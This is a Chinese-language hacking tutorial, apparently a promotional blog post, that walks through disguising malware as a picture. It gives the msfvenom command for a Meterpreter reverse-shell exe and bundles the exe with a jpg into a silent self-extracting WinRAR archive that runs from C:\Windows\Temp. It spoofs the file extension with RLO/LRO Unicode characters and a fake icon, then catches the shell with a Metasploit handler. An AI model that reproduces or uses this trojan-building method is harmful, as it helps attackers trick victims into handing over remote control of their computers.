生成伪装恶意程序的封面图标

需要安装rar压缩工具。 WinRAR官网：www.winrar.com.cn/ 下载安装即可不需要特殊配置。

msfvenom生成exe

┌──(root💀xuegod53)-[~]
└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.53 LPORT=4444 -f exe -o /var/www/html/dongman.exe
复制代码

准备一张图片

图片生成ico图标用于恶意程序的封面图标：www.ico51.cn/ 注：图片尺寸选最大的，也可以找一下其它的ico图标生成网站。

转换后会自动下载

捆绑恶意程序和图片并设置自动运行

选中dongman.exe和dongman.jpg添加到压缩文件。

勾选：创建自解压格式压缩文件

设置自解压选项

解压路径：C:\Windows\Temp 注：dongman.exe和dongman.jpg会被解压到C:\Windows\Temp

解压后运行dongman.exe和dongman.jpg C:\Windows\Temp\dongman.jpg C:\Windows\Temp\dongman.exe

静默方式解压

更新方式 多次解压可能会出现文件已经存在的情况，如果文件存在会询问用户。 建议选择覆盖所有文件或跳过已存在的文件。 覆盖：缺点是如果exe程序已经运行那么覆盖会失败。 跳过：如果exe文件的参数有修改跳过后则运行的还是旧版本。 建议：每次制作不要用相同的名字

添加刚才生成的ico图标。

生成后的自解压文件。

使用Unicode字符修改文件名后缀

重命名

选中文件名鼠标右键插入RLO RLO从右到左 LRO从左到右

插入gpj，RLO是从右到左，所以最终gpj=jpg

此时文件名后缀为exe.jpg，那这样还不理想，文件名部分是exe还是没什么意义

添加文件名 重命名，在exe前面插入Unicode控制字符LRO

输入文件名：动漫gpj.exe‬‬‬‬‬‬

最终效果，文件有ico图标伪装图片的缩略图，文件名后缀.jpg来伪装文件类型。 注：exe.不可以去掉

通过访问图片自动获取目标shell

┌──(root💀xuegod53)-[~]
└─# msfdb run     
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.53
msf5 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run
复制代码

打开动漫gpj.exe

图片文件自动打开

MSF成功上线

临时目录下文件也都存在。 C:\Windows\Temp

更多技术干货请关注公众号【学神来啦】！